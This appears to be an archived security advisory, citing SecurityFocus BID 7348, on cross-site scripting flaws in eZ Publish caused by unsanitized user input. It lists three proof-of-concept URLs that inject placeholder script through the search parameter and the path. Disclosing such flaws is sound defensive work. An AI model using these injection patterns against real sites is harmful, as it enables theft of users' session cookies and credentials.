9 lines
No EOL
528 B
Text
9 lines
No EOL
528 B
Text
source: http://www.securityfocus.com/bid/7348/info
|
|
|
|
Several cross site scripting vulnerabilities have been reported for eZ Publish. These vulnerabilities are due to insufficient sanitization of user-supplied data submitted to eZ Publish.
|
|
|
|
Exploitation may allow theft of cookie-based authentication credentials or other attacks.
|
|
|
|
http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
|
|
http://[target]/index.php/[any_section]/">[hostile_code]<
|
|
http://[target]/index.php/"><script>[hostile_code]< |